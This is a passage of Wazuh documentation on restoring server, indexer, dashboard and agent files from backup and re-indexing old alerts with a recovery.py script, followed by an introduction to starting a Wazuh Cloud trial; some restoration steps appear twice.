    
    # Converting timestamp args to datetime
    min_timestamp = datetime.strptime(args.min_timestamp, '%Y-%m-%dT%H:%M:%S')
    max_timestamp = datetime.strptime(args.max_timestamp, '%Y-%m-%dT%H:%M:%S')
    
    chunk = 0
    written_alerts = 0
    trimmed_alerts = open(output_file, 'w')
    
    max_time=datetime(max_year, max_month, max_day)
    current_time=datetime(min_year, min_month, min_day)
    
    while current_time <= max_time:
        alert_file = "{0}logs/alerts/{1}/{2}/ossec-alerts-{3:02}.json.gz".format(wazuh_path,current_time.year,month_dict[current_time.month],current_time.day)
    
        if os.path.exists(alert_file):
            daily_alerts = 0
            compressed_alerts = gzip.open(alert_file, 'r')
            log("Reading file: "+ alert_file)
            for line in compressed_alerts:
                # Transform line to json object
                try:
                    line_json = json.loads(line.decode("utf-8", "replace"))
    
                    # Remove unnecessary part of the timestamp
                    string_timestamp = line_json['timestamp'][:19]
    
                    # Ensure timestamp integrity
                    while len(line_json['timestamp'].split("+")[0]) < 23:
                        line_json['timestamp'] = line_json['timestamp'][:20] + "0" + line_json['timestamp'][20:]
    
                    # Get the timestamp readable
                    event_date = datetime.strptime(string_timestamp, '%Y-%m-%dT%H:%M:%S')
    
                    # Check the timestamp belongs to the selected range
                    if (event_date <= max_timestamp and event_date >= min_timestamp):
                        chunk+=1
                        trimmed_alerts.write(json.dumps(line_json))
                        trimmed_alerts.write("\n")
                        trimmed_alerts.flush()
                        daily_alerts += 1
                        if chunk >= EPS_MAX:
                            chunk = 0
                            time.sleep(2)
                        if os.path.getsize(output_file) >= max_bytes:
                            trimmed_alerts.close()
                            log("Output file reached max size, setting it to zero and restarting")
                            time.sleep(EPS_MAX/100)
                            trimmed_alerts = open(output_file, 'w')
    
                except ValueError as e:
                    print("Oops! Something went wrong reading: {}".format(line))
                    print("This is the error: {}".format(str(e)))
    
            compressed_alerts.close()
            log("Extracted {0} alerts from day {1}-{2}-{3}".format(daily_alerts,current_time.day,month_dict[current_time.month],current_time.year))
        else:
            log("Couldn't find file {}".format(alert_file))
    
        #Move to next file
        current_time += timedelta(days=1)
    
    trimmed_alerts.close()
    

    When running the recovery.py script, consider the following parameters:

    usage: recovery.py [-h] [-eps eps] -min min_timestamp -max max_timestamp -o
                          output_file [-log log_file] [-w wazuh_path]
                          [-sz max_size]
    
      -eps eps, --eps eps   Events per second. Default: 400
      -min min_timestamp, --min_timestamp min_timestamp
                            Min timestamp. Example: 2019-11-13T08:42:17
      -max max_timestamp, --max_timestamp max_timestamp
                            Max timestamp. Example: 2019-11-13T23:59:06
      -o output_file, --output_file output_file
                            Alerts output file.
      -log log_file, --log_file log_file
                            Logs output.
      -w wazuh_path, --wazuh_path wazuh_path
                            Path to Wazuh. By default:/var/ossec/
      -sz max_size, --max_size max_size
                            Max output file size in Gb. Default: 1Gb. Example: 2.5
    
  3. Run the command below to make the recovery.py script executable:

    # chmod +x recovery.py
    
  4. Execute the script in the background using the nohup command so that it keeps running after the session is closed. It may take some time depending on the size of the old logs.

    Usage example:

    # nohup ./recovery.py -eps 500 -min 2023-06-10T00:00:00 -max 2023-06-18T23:59:59 -o /tmp/recovery.json -log ./recovery.log -sz 2.5 &
    
  5. Add the /tmp/recovery.json path to the Wazuh Filebeat module /usr/share/filebeat/module/wazuh/alerts/manifest.yml so that Filebeat sends the old alerts to the Wazuh indexer for indexing:

    module_version: 0.1
    
    var:
      - name: paths
        default:
          - /var/ossec/logs/alerts/alerts.json
          - /tmp/recovery.json
      - name: index_prefix
        default: wazuh-alerts-4.x-
    
    input: config/alerts.yml
    
    ingest_pipeline: ingest/pipeline.json
    
  6. Restart Filebeat for the changes to take effect:

    # systemctl restart filebeat
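After Filebeat restarts, you can confirm that the re-injected alerts are being indexed by querying the Wazuh indexer. A quick check, assuming the default port and the admin user:

    # curl -k -u admin:<ADMIN_PASSWORD> "https://<WAZUH_INDEXER_ADDRESS>:9200/_cat/indices/wazuh-alerts-*?v"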
    
Verifying data restoration

Using the Wazuh dashboard, navigate to the Threat Hunting, File Integrity Monitoring, Vulnerability Detection, and any other modules to see if the data is restored successfully.

Multi-node data restoration

Perform the actions below to restore the Wazuh central components on their respective Wazuh nodes.

Preparing the data restoration
  1. Compress the files generated after performing Wazuh files backup and transfer them to the respective new servers:

    # tar -cvzf <SERVER_HOSTNAME>.tar.gz ~/wazuh_files_backup/
    

    Where:

    • <SERVER_HOSTNAME> represents the current server name. Consider adding a suffix such as _indexer, _server, or _dashboard if the current hostnames don't indicate the node type.

    Note

    Make sure that Wazuh indexer compressed files are transferred to the new Wazuh indexer nodes, Wazuh server compressed files are transferred to the new Wazuh server nodes, and Wazuh dashboard compressed files are transferred to the new Wazuh dashboard nodes.

  2. Move the compressed file to the root / directory of each node:

    # mv <SERVER_HOSTNAME>.tar.gz /
    # cd /
    
  3. Decompress the backup files and change the current working directory to the directory based on the date and time of the backup files:

    # tar -xzvf <SERVER_HOSTNAME>.tar.gz
    # cd ~/wazuh_files_backup/<DATE_TIME>
    
Restoring Wazuh indexer files

You need to have a new installation of Wazuh indexer. Follow the Wazuh indexer - Installation guide to perform a fresh Wazuh indexer installation.

Perform the following steps on each Wazuh indexer node.

  1. Stop the Wazuh indexer to prevent any modification to the Wazuh indexer files during the restore process:

    # systemctl stop wazuh-indexer
    
  2. Restore the Wazuh indexer configuration files, and change the file permissions and ownerships accordingly:

    # sudo cp etc/wazuh-indexer/jvm.options /etc/wazuh-indexer/jvm.options
    # chown wazuh-indexer:wazuh-indexer /etc/wazuh-indexer/jvm.options
    # sudo cp etc/wazuh-indexer/jvm.options.d /etc/wazuh-indexer/jvm.options.d
    # chown wazuh-indexer:wazuh-indexer /etc/wazuh-indexer/jvm.options.d
    # sudo cp etc/wazuh-indexer/log4j2.properties /etc/wazuh-indexer/log4j2.properties
    # chown wazuh-indexer:wazuh-indexer /etc/wazuh-indexer/log4j2.properties
    # sudo cp etc/wazuh-indexer/opensearch.keystore /etc/wazuh-indexer/opensearch.keystore
    # chown wazuh-indexer:wazuh-indexer /etc/wazuh-indexer/opensearch.keystore
    # sudo cp -r etc/wazuh-indexer/opensearch-observability/* /etc/wazuh-indexer/opensearch-observability/
    # chown -R wazuh-indexer:wazuh-indexer /etc/wazuh-indexer/opensearch-observability/
    # sudo cp -r etc/wazuh-indexer/opensearch-reports-scheduler/* /etc/wazuh-indexer/opensearch-reports-scheduler/
    # chown -R wazuh-indexer:wazuh-indexer /etc/wazuh-indexer/opensearch-reports-scheduler/
    # sudo cp usr/lib/sysctl.d/wazuh-indexer.conf /usr/lib/sysctl.d/wazuh-indexer.conf
    
  3. Start the Wazuh indexer service:

    # systemctl start wazuh-indexer
    
Restoring Wazuh server files

You need to have a new installation of a Wazuh server. Follow the Wazuh server - Installation guide to perform a multi-node Wazuh server installation. There will be at least one master node and one worker node as node types. Perform the steps below, considering your node type.

  1. Stop the Wazuh manager and Filebeat to prevent any modification to the Wazuh server files during the restore process:

    # systemctl stop filebeat
    # systemctl stop wazuh-manager
    
  2. Copy Wazuh server data and configuration files, and change the file permissions and ownerships accordingly:

    # sudo cp etc/filebeat/filebeat.reference.yml /etc/filebeat/
    # sudo cp etc/filebeat/fields.yml /etc/filebeat/
    # sudo cp -r etc/filebeat/modules.d/* /etc/filebeat/modules.d/
    # sudo cp -r etc/postfix/* /etc/postfix/
    # sudo cp var/ossec/etc/client.keys /var/ossec/etc/
    # chown root:wazuh /var/ossec/etc/client.keys
    # sudo cp -r var/ossec/etc/sslmanager* /var/ossec/etc/
    # sudo cp var/ossec/etc/ossec.conf /var/ossec/etc/
    # chown root:wazuh /var/ossec/etc/ossec.conf
    # sudo cp var/ossec/etc/internal_options.conf /var/ossec/etc/
    # chown root:wazuh /var/ossec/etc/internal_options.conf
    # sudo cp var/ossec/etc/local_internal_options.conf /var/ossec/etc/
    # chown root:wazuh /var/ossec/etc/local_internal_options.conf
    # sudo cp -r var/ossec/etc/rules/* /var/ossec/etc/rules/
    # chown -R wazuh:wazuh /var/ossec/etc/rules/
    # sudo cp -r var/ossec/etc/decoders/* /var/ossec/etc/decoders
    # chown -R wazuh:wazuh /var/ossec/etc/decoders/
    # sudo cp -r var/ossec/etc/shared/*  /var/ossec/etc/shared/
    # chown -R wazuh:wazuh /var/ossec/etc/shared/
    # chown root:wazuh /var/ossec/etc/shared/ar.conf
    # sudo cp -r var/ossec/logs/* /var/ossec/logs/
    # chown -R wazuh:wazuh /var/ossec/logs/
    # sudo cp -r var/ossec/queue/agentless/*  /var/ossec/queue/agentless/
    # chown -R wazuh:wazuh /var/ossec/queue/agentless/
    # sudo cp var/ossec/queue/agents-timestamp /var/ossec/queue/
    # chown root:wazuh /var/ossec/queue/agents-timestamp
    # sudo cp -r var/ossec/queue/fts/* /var/ossec/queue/fts/
    # chown -R wazuh:wazuh /var/ossec/queue/fts/
    # sudo cp -r var/ossec/queue/rids/* /var/ossec/queue/rids/
    # chown -R wazuh:wazuh /var/ossec/queue/rids/
    # sudo cp -r var/ossec/stats/* /var/ossec/stats/
    # chown -R wazuh:wazuh /var/ossec/stats/
    # sudo cp -r var/ossec/var/multigroups/* /var/ossec/var/multigroups/
    # chown -R wazuh:wazuh /var/ossec/var/multigroups/
    
  3. Restore certificates for Wazuh agent and Wazuh server communication, and additional configuration files if present:

    # sudo cp -r var/ossec/etc/*.pem /var/ossec/etc/
    # chown -R root:wazuh /var/ossec/etc/*.pem
    # sudo cp var/ossec/etc/authd.pass /var/ossec/etc/
    # chown -R root:wazuh /var/ossec/etc/authd.pass
    
  4. Restore your custom files. If you have custom active response scripts, CDB lists, integrations, or wodle commands, adapt the following commands accordingly:

    # sudo cp var/ossec/active-response/bin/<CUSTOM_AR_SCRIPT> /var/ossec/active-response/bin/
    # chown root:wazuh /var/ossec/active-response/bin/<CUSTOM_AR_SCRIPT>
    # sudo cp var/ossec/etc/lists/<USER_CDB_LIST>.cdb /var/ossec/etc/lists/
    # chown root:wazuh /var/ossec/etc/lists/<USER_CDB_LIST>.cdb
    # sudo cp var/ossec/integrations/<CUSTOM_INTEGRATION_SCRIPT> /var/ossec/integrations/
    # chown root:wazuh /var/ossec/integrations/<CUSTOM_INTEGRATION_SCRIPT>
    # sudo cp var/ossec/wodles/<CUSTOM_WODLE_SCRIPT> /var/ossec/wodles/
    # chown root:wazuh /var/ossec/wodles/<CUSTOM_WODLE_SCRIPT>
    
  5. Restore the Wazuh databases that contain collected data from Wazuh agents:

    # sudo cp var/ossec/queue/db/* /var/ossec/queue/db/
    # chown -R wazuh:wazuh /var/ossec/queue/db/
    
  6. Start the Filebeat service:

    # systemctl start filebeat
    
  7. Start the Wazuh manager service:

    # systemctl start wazuh-manager
    
Restoring Wazuh dashboard files

You need to have a new installation of the Wazuh dashboard. Follow the Wazuh dashboard - Installation guide to perform a fresh Wazuh dashboard installation.

If your backup includes Wazuh reports or custom images, perform the following steps to restore them on the new server.

  1. Restore your Wazuh reports using the following command:

    # mkdir -p /usr/share/wazuh-dashboard/data/wazuh/downloads/reports/
    # sudo cp -r usr/share/wazuh-dashboard/data/wazuh/downloads/reports/* /usr/share/wazuh-dashboard/data/wazuh/downloads/reports/
    # chown -R wazuh-dashboard:wazuh-dashboard /usr/share/wazuh-dashboard/data/wazuh/downloads/
    
  2. Navigate to Dashboard management > App Settings > Custom branding from the Wazuh dashboard and upload your custom images.

Restoring old logs

By default, Wazuh compresses logs that are older than one day. The old logs restored in the Restoring Wazuh server files section therefore remain compressed.

Perform the following actions on both the master and worker nodes of your Wazuh server to decompress the old logs and re-inject them into the Wazuh indexer for indexing.

Note

Restored old logs will have a creation date corresponding to the day the restoration is performed.

  1. Create a Python script called recovery.py on your Wazuh server. This script decompresses all the old logs and stores them in the recovery.json file in the /tmp directory.

    # touch recovery.py
    
  2. Add the following content to the recovery.py script:

    #!/usr/bin/env python
    
    import gzip
    import time
    import json
    import argparse
    import re
    import os
    from datetime import datetime
    from datetime import timedelta
    
    def log(msg):
        now_date = datetime.now().strftime('%Y-%m-%d %H:%M:%S')
        final_msg = "{0} wazuh-reinjection: {1}".format(now_date, msg)
        print(final_msg)
        if log_file:
            f_log.write(final_msg + "\n")
    
    EPS_MAX = 400
    wazuh_path = '/var/ossec/'
    max_size=1
    log_file = None
    
    parser = argparse.ArgumentParser(description='Reinjection script')
    parser.add_argument('-eps','--eps', metavar='eps', type=int, required = False, help='Events per second.')
    parser.add_argument('-min', '--min_timestamp', metavar='min_timestamp', type=str, required = True, help='Min timestamp. Example: 2017-12-13T23:59:06')
    parser.add_argument('-max', '--max_timestamp', metavar='max_timestamp', type=str, required = True, help='Max timestamp. Example: 2017-12-13T23:59:06')
    parser.add_argument('-o', '--output_file', metavar='output_file', type=str, required = True, help='Output filename.')
    parser.add_argument('-log', '--log_file', metavar='log_file', type=str, required = False, help='Logs output')
    parser.add_argument('-w', '--wazuh_path', metavar='wazuh_path', type=str, required = False, help='Path to Wazuh. By default:/var/ossec/')
    parser.add_argument('-sz', '--max_size', metavar='max_size', type=float, required = False, help='Max output file size in Gb. Default: 1Gb. Example: 2.5')
    
    args = parser.parse_args()
    
    if args.log_file:
        log_file = args.log_file
        f_log = open(log_file, 'a+')
    
    
    if args.max_size:
        max_size = args.max_size
    
    if args.wazuh_path:
        wazuh_path = args.wazuh_path
    
    output_file = args.output_file
    
    #Gb to bytes
    max_bytes = int(max_size * 1024 * 1024 * 1024)
    
    if (max_bytes <= 0):
        log("Error: Incorrect max_size")
        exit(1)
    
    month_dict = ['Null','Jan','Feb','Mar','Apr', 'May', 'Jun', 'Jul', 'Aug', 'Sep', 'Oct', 'Nov','Dec']
    
    if args.eps:
        EPS_MAX = args.eps
    
    if EPS_MAX < 0:
        log("Error: incorrect EPS")
        exit(1)
    
    min_date = re.search('(\\d\\d\\d\\d)-(\\d\\d)-(\\d\\d)T\\d\\d:\\d\\d:\\d\\d', args.min_timestamp)
    if min_date:
        min_year = int(min_date.group(1))
        min_month = int(min_date.group(2))
        min_day = int(min_date.group(3))
    else:
        log("Error: Incorrect min timestamp")
        exit(1)
    
    max_date = re.search('(\\d\\d\\d\\d)-(\\d\\d)-(\\d\\d)T\\d\\d:\\d\\d:\\d\\d', args.max_timestamp)
    if max_date:
        max_year = int(max_date.group(1))
        max_month = int(max_date.group(2))
        max_day = int(max_date.group(3))
    else:
        log("Error: Incorrect max timestamp")
        exit(1)
    
    # Converting timestamp args to datetime
    min_timestamp = datetime.strptime(args.min_timestamp, '%Y-%m-%dT%H:%M:%S')
    max_timestamp = datetime.strptime(args.max_timestamp, '%Y-%m-%dT%H:%M:%S')
    
    chunk = 0
    written_alerts = 0
    trimmed_alerts = open(output_file, 'w')
    
    max_time=datetime(max_year, max_month, max_day)
    current_time=datetime(min_year, min_month, min_day)
    
    while current_time <= max_time:
        alert_file = "{0}logs/alerts/{1}/{2}/ossec-alerts-{3:02}.json.gz".format(wazuh_path,current_time.year,month_dict[current_time.month],current_time.day)
    
        if os.path.exists(alert_file):
            daily_alerts = 0
            compressed_alerts = gzip.open(alert_file, 'r')
            log("Reading file: "+ alert_file)
            for line in compressed_alerts:
                # Transform line to json object
                try:
                    line_json = json.loads(line.decode("utf-8", "replace"))
    
                    # Remove unnecessary part of the timestamp
                    string_timestamp = line_json['timestamp'][:19]
    
                    # Ensure timestamp integrity
                    while len(line_json['timestamp'].split("+")[0]) < 23:
                        line_json['timestamp'] = line_json['timestamp'][:20] + "0" + line_json['timestamp'][20:]
    
                    # Get the timestamp readable
                    event_date = datetime.strptime(string_timestamp, '%Y-%m-%dT%H:%M:%S')
    
                    # Check the timestamp belongs to the selected range
                    if (event_date <= max_timestamp and event_date >= min_timestamp):
                        chunk+=1
                        trimmed_alerts.write(json.dumps(line_json))
                        trimmed_alerts.write("\n")
                        trimmed_alerts.flush()
                        daily_alerts += 1
                        if chunk >= EPS_MAX:
                            chunk = 0
                            time.sleep(2)
                        if os.path.getsize(output_file) >= max_bytes:
                            trimmed_alerts.close()
                            log("Output file reached max size, setting it to zero and restarting")
                            time.sleep(EPS_MAX/100)
                            trimmed_alerts = open(output_file, 'w')
    
                except ValueError as e:
                    print("Oops! Something went wrong reading: {}".format(line))
                    print("This is the error: {}".format(str(e)))
    
            compressed_alerts.close()
            log("Extracted {0} alerts from day {1}-{2}-{3}".format(daily_alerts,current_time.day,month_dict[current_time.month],current_time.year))
        else:
            log("Couldn't find file {}".format(alert_file))
    
        #Move to next file
        current_time += timedelta(days=1)
    
    trimmed_alerts.close()
    

    When running the recovery.py script, consider the following parameters:

    usage: recovery.py [-h] [-eps eps] -min min_timestamp -max max_timestamp -o
                          output_file [-log log_file] [-w wazuh_path]
                          [-sz max_size]
    
      -eps eps, --eps eps   Events per second. Default: 400
      -min min_timestamp, --min_timestamp min_timestamp
                            Min timestamp. Example: 2019-11-13T08:42:17
      -max max_timestamp, --max_timestamp max_timestamp
                            Max timestamp. Example: 2019-11-13T23:59:06
      -o output_file, --output_file output_file
                            Alerts output file.
      -log log_file, --log_file log_file
                            Logs output.
      -w wazuh_path, --wazuh_path wazuh_path
                            Path to Wazuh. By default:/var/ossec/
      -sz max_size, --max_size max_size
                            Max output file size in Gb. Default: 1Gb. Example: 2.5
    
  3. Run the command below to make the recovery.py script executable:

    # chmod +x recovery.py
    
  4. Execute the script in the background using the nohup command so that it keeps running after the session is closed. It may take some time depending on the size of the old logs.

    Usage example:

    # nohup ./recovery.py -eps 500 -min 2023-06-10T00:00:00 -max 2023-06-18T23:59:59 -o /tmp/recovery.json -log ./recovery.log -sz 2.5 &
    
  5. Add the /tmp/recovery.json path to the Wazuh Filebeat module /usr/share/filebeat/module/wazuh/alerts/manifest.yml so that Filebeat sends the old alerts to the Wazuh indexer for indexing:

    module_version: 0.1
    
    var:
      - name: paths
        default:
          - /var/ossec/logs/alerts/alerts.json
          - /tmp/recovery.json
      - name: index_prefix
        default: wazuh-alerts-4.x-
    
    input: config/alerts.yml
    
    ingest_pipeline: ingest/pipeline.json
    
  6. Restart Filebeat for the changes to take effect.

    # systemctl restart filebeat
    
Verifying data restoration

Using the Wazuh dashboard, navigate to the Threat Hunting, File Integrity Monitoring, Vulnerability Detection, and any other modules to see if the data is restored successfully.

Wazuh agent

Restore your Wazuh agent installation by following these steps.

Note

You need elevated privileges to execute the commands below.

Linux

You need to have a new installation of the Wazuh agent on a Linux endpoint. Follow the Deploying Wazuh agents on Linux endpoints guide to perform a fresh Wazuh agent installation.

Preparing the data restoration
  1. Compress the files generated after performing the Wazuh files backup and transfer them to the respective monitored endpoints.

    # tar -cvzf wazuh_agent.tar.gz ~/wazuh_files_backup/
    
  2. Move the compressed file to the root / directory of your node:

    # mv wazuh_agent.tar.gz /
    # cd /
    
  3. Decompress the backup files and change the current working directory to the directory based on the date and time of the backup files.

    # tar -xzvf wazuh_agent.tar.gz
    # cd ~/wazuh_files_backup/<DATE_TIME>
    
Restoring Wazuh agent files

Perform the steps below to restore the Wazuh agent files on a Linux endpoint.

  1. Stop the Wazuh agent to prevent any modification to the Wazuh agent files during the restore process:

    # systemctl stop wazuh-agent
    
  2. Restore Wazuh agent data, certificates, and configuration files, and change the file permissions and ownerships accordingly:

    # sudo cp var/ossec/etc/client.keys /var/ossec/etc/
    # chown wazuh:wazuh /var/ossec/etc/client.keys
    # sudo cp var/ossec/etc/ossec.conf /var/ossec/etc/
    # chown root:wazuh /var/ossec/etc/ossec.conf
    # sudo cp var/ossec/etc/internal_options.conf /var/ossec/etc/
    # chown root:wazuh /var/ossec/etc/internal_options.conf
    # sudo cp var/ossec/etc/local_internal_options.conf /var/ossec/etc/
    # chown root:wazuh /var/ossec/etc/local_internal_options.conf
    # sudo cp -r var/ossec/etc/*.pem /var/ossec/etc/
    # chown -R root:wazuh /var/ossec/etc/*.pem
    # sudo cp -r var/ossec/logs/* /var/ossec/logs/
    # chown -R wazuh:wazuh /var/ossec/logs/
    # sudo cp -r var/ossec/queue/rids/* /var/ossec/queue/rids/
    # chown -R wazuh:wazuh /var/ossec/queue/rids/
    
  3. Restore your custom files, such as local SCA policies, active response scripts, and wodle commands, if there are any, and change the file permissions. Adapt the following commands accordingly.

    # sudo cp var/ossec/etc/<SCA_DIRECTORY>/<CUSTOM_SCA_FILE> /var/ossec/etc/<SCA_DIRECTORY>/
    # chown wazuh:wazuh /var/ossec/etc/<SCA_DIRECTORY>/<CUSTOM_SCA_FILE>
    # sudo cp var/ossec/active-response/bin/<CUSTOM_ACTIVE_RESPONSE_SCRIPT> /var/ossec/active-response/bin/
    # chown root:wazuh /var/ossec/active-response/bin/<CUSTOM_ACTIVE_RESPONSE_SCRIPT>
    # sudo cp var/ossec/wodles/<CUSTOM_WODLE_SCRIPT> /var/ossec/wodles/
    # chown root:wazuh /var/ossec/wodles/<CUSTOM_WODLE_SCRIPT>
    
  4. Start the Wazuh agent service:

    # systemctl start wazuh-agent
    
Windows

You need to have a new installation of the Wazuh agent on a Windows endpoint. Follow the Deploying Wazuh agents on Windows endpoints guide to perform a fresh Wazuh agent installation.

Preparing the data restoration
  1. Compress the files generated after performing the Wazuh files backup and transfer them to the Downloads directory of the respective agent endpoints.

  2. Decompress the file using 7-Zip or any of your preferred tools.

Restoring Wazuh agent files

Perform the steps below to restore Wazuh agent files on a Windows endpoint.

  1. Stop the Wazuh agent to prevent any modification to the Wazuh agent files during the restore process by running the following command on PowerShell as an administrator:

    > NET STOP WazuhSvc
    
  2. Launch PowerShell as an administrator, navigate to the wazuh_files_backup/<DATE_TIME> folder that contains the backup files, and store its path in a variable (for example, $bkp_folder) so it can be used in the commands below.

  3. Run the following commands to copy the Wazuh agent data, certificates, and configurations:

    > Copy-Item "$bkp_folder\client.keys" "C:\Program Files (x86)\ossec-agent" -Recurse -Force
    > Copy-Item "$bkp_folder\ossec.conf" "C:\Program Files (x86)\ossec-agent" -Recurse -Force
    > Copy-Item "$bkp_folder\internal_options.conf" "C:\Program Files (x86)\ossec-agent" -Recurse -Force
    > Copy-Item "$bkp_folder\local_internal_options.conf" "C:\Program Files (x86)\ossec-agent" -Recurse -Force
    > Copy-Item "$bkp_folder\*.pem" "C:\Program Files (x86)\ossec-agent" -Recurse -Force
    > Copy-Item "$bkp_folder\ossec.log" "C:\Program Files (x86)\ossec-agent" -Recurse -Force
    > Copy-Item "$bkp_folder\logs\*" "C:\Program Files (x86)\ossec-agent\logs" -Recurse -Force
    > Copy-Item "$bkp_folder\rids\*" "C:\Program Files (x86)\ossec-agent\rids" -Recurse -Force
    

    You can also copy these files using the drag and drop method.

  4. Restore your custom files, such as local SCA policies, active response scripts, and wodle commands, if there are any. Adapt the following command accordingly.

    # Example variables - replace with your actual file names and folders
    $SCA_DIRECTORY = "sca"
    $CUSTOM_SCA_FILE = "custom_sca.yml"
    $CUSTOM_ACTIVE_RESPONSE_SCRIPT = "my_response.ps1"
    $CUSTOM_WODLE_SCRIPT = "custom_wodle.py"
    
    > Copy-Item "$SCA_DIRECTORY\$CUSTOM_SCA_FILE" "C:\Program Files (x86)\ossec-agent\$SCA_DIRECTORY" -Recurse -Force
    > Copy-Item "active-response\bin\$CUSTOM_ACTIVE_RESPONSE_SCRIPT" "C:\Program Files (x86)\ossec-agent\active-response\bin" -Recurse -Force
    > Copy-Item "wodles\$CUSTOM_WODLE_SCRIPT" "C:\Program Files (x86)\ossec-agent\wodles" -Recurse -Force
    
  5. Start the Wazuh agent service by running the following command on the Command Prompt as an administrator:

    NET START WazuhSvc
    
macOS

You need to have a new installation of the Wazuh agent on a macOS endpoint. Follow the Deploying Wazuh agents on macOS endpoints guide to perform a fresh Wazuh agent installation.

Preparing the data restoration
  1. Compress the files generated after performing the Wazuh files backup and transfer them to the endpoint with the Wazuh agent installed.

    # tar -cvzf wazuh_agent.tar.gz ~/wazuh_files_backup/
    
  2. Move the compressed file to the Downloads directory of your node:

    # mv wazuh_agent.tar.gz ~/Downloads
    # cd ~/Downloads
    
  3. Decompress the backup files and change the current working directory to the directory based on the date and time of the backup files.

    # tar -xzvf wazuh_agent.tar.gz
    # cd wazuh_files_backup/<DATE_TIME>
    
Restoring Wazuh agent files

Perform the steps below to restore Wazuh agent files on a macOS endpoint.

  1. Stop the Wazuh agent to prevent any modification to the Wazuh agent files during the restore process:

    # launchctl bootout system /Library/LaunchDaemons/com.wazuh.agent.plist
    
  2. Restore Wazuh agent data, certificates, and configuration files:

    # cp Library/Ossec/etc/client.keys /Library/Ossec/etc/
    # cp Library/Ossec/etc/ossec.conf /Library/Ossec/etc/
    # cp Library/Ossec/etc/internal_options.conf /Library/Ossec/etc/
    # cp Library/Ossec/etc/local_internal_options.conf /Library/Ossec/etc/
    # cp -R Library/Ossec/etc/*.pem /Library/Ossec/etc/
    # cp -R Library/Ossec/logs/* /Library/Ossec/logs/
    # cp -R Library/Ossec/queue/rids/* /Library/Ossec/queue/rids/
    
  3. Restore custom files, such as local SCA policies, active response, and wodle scripts, if there are any.

    # sudo cp Library/Ossec/<SCA_DIRECTORY>/<CUSTOM_SCA_FILE> /Library/Ossec/<SCA_DIRECTORY>/
    # sudo cp Library/Ossec/active-response/bin/<CUSTOM_ACTIVE_RESPONSE_SCRIPT> /Library/Ossec/active-response/bin/
    # sudo cp Library/Ossec/wodles/<CUSTOM_WODLE_SCRIPT> /Library/Ossec/wodles/
    
  4. Start the Wazuh agent service:

    # launchctl bootstrap system /Library/LaunchDaemons/com.wazuh.agent.plist
    
Verifying data restoration
  1. Run the command below on your Wazuh server to check if the Wazuh agent is connected and active:

    # /var/ossec/bin/agent_control -l
    
  2. Using the Wazuh dashboard, navigate to Active agents. Select your Wazuh agent to see the data from the backup, such as Threat Hunting, Vulnerability Detection, Configuration Assessment, and others.

Wazuh Cloud service

Wazuh is a free and open source platform that delivers unified Security Information and Event Management (SIEM) and Extended Detection and Response (XDR) capabilities. It protects workloads across on-premises, virtualized, cloud, and containerized environments.

You can deploy Wazuh in three ways:

  • On-premises, managed entirely by you.

  • In your own cloud environment, under your control.

  • With Wazuh Cloud, a fully managed service operated by Wazuh.

Wazuh Cloud hosts and manages all central components in a unified, secure environment. The service provides fast provisioning, automated scaling, ongoing updates, and operational management, so you can focus on security operations rather than infrastructure.

Wazuh Cloud benefits

  • Fully managed service: We take care of installation, scaling, updates, and monitoring of Wazuh components.

  • Immediate time-to-value: A ready-to-use solution, with no additional hardware or software required, reducing cost and complexity.

  • High availability and scalability: A flexible infrastructure that you can tailor to your specific needs and upgrade to the most appropriate tier.

  • Wazuh AI security analyst: Automate your security analysis and receive actionable insights to help you understand and strengthen your security posture.

  • Security and regulatory compliance: Fully protected data, with regular application of security patches and hardening practices. Compliant with PCI DSS and SOC 2.

  • Customizable environments: Tailor retention, integrations, and resources to match your needs.

  • Support and monitoring: Continuous monitoring of the platform and access to Wazuh technical support.

Shared responsibility model

With Wazuh Cloud, responsibilities are divided between the service and the customer.

Managed by Wazuh

  • Hosting, deployment, and maintenance of Wazuh central components.

  • Infrastructure monitoring, scaling, and high availability.

  • Security of the underlying platform.

  • Service updates and version upgrades.

Managed by customer

  • Deploying and configuring Wazuh agents on your endpoints.

  • Defining custom detection rules, alerting policies, and integrations.

  • Managing access control for your users.

  • Responding to incidents detected in your environment.

Learn more about Wazuh Cloud in the sections below.

Getting started

Wazuh Cloud eliminates the need to deploy, configure, or maintain the Wazuh platform yourself. All central components are automatically installed, updated, and scaled by the service. This allows you to focus on securing your environment and responding to threats, rather than managing the underlying infrastructure.

The steps below guide you from account creation to monitoring your endpoints.

Sign up for a trial

You can start with a free trial to create an environment and explore Wazuh Cloud service. Wazuh provides a 14-day free trial period.

Follow these steps to create your trial environment.

Note

No credit card is required to start the free trial. See the Wazuh Cloud page for information related to the Wazuh Cloud trial experience.

Signing up

Perform the following steps to sign up for a free trial:

  1. Go to the Wazuh Cloud page.

  2. Select Start your free trial.

  3. Fill in the required information and click Start free trial.

  4. Verify your email address.

Now you are ready to create your first environment.

Creating environment

Follow these steps to set up and run your environment:

  1. Log in to the Wazuh Cloud Console using your email address and password configured during registration.

  2. Click Create environment.

  3. Give your environment a name.

  4. Fill in the use case. This information helps us understand how our users use the service, allowing us to improve it accordingly.

  5. Select your preferred region for data residency. If you are not sure what to pick, select the region closest to your location to reduce latency for indexing and search requests.

  6. Select one of the available profiles: Small, Medium or Large. If none of these predefined profiles meets your requirements, select the Custom option to customize the settings.

    Metric                           Small         Medium         Large
    ------------------------------   -----------   ------------   ------------
    Active agents                    Up to 100     Up to 250      Up to 500
    Indexed data retention           1 month       3 months       3 months
    Archived data retention          3 months      1 year         1 year
    Average/Peak Events Per Second   100/500 EPS   250/1250 EPS   500/2500 EPS
    Indexed data capacity            25 GB         250 GB         500 GB

    For more details about the settings and their functionality, see the Settings section.

    Note

    During the trial period, some settings are limited. However, they do not prevent you from exploring and using the Wazuh Cloud platform. All restrictions are removed once you purchase the environment.

  7. Select your pricing: Monthly or Annual. If you choose the monthly option, you will be billed monthly, whereas the annual option entails a single payment per year.

  8. Click Start your free trial to build your environment. This process might take a few minutes.

  9. Once your environment is ready, access the Wazuh dashboard and enroll agents to start monitoring your endpoints.

Create Wazuh cloud service environment

Note

If you do not enroll an agent within 3 days of starting the trial, your environment will be terminated due to inactivity.

Accessing the Wazuh dashboard

The Wazuh dashboard is a flexible and intuitive web interface that provides visualizations giving you comprehensive insight into your monitored endpoints.

Follow these steps to access the Wazuh dashboard:

  1. Log in to the Wazuh Cloud Console.

  2. Select the environment you want to access from the Environments page.

  3. Click Open Wazuh to open the Wazuh dashboard.

  4. Log in with the default credentials. You can view them by clicking Manage and selecting Default credentials on the Environments page.

Note

When accessing the Wazuh dashboard for the first time, use the default credentials. Afterwards, you can log in using single sign-on (SSO), if enabled, or with user accounts created in the Wazuh dashboard.

Changing the default credentials

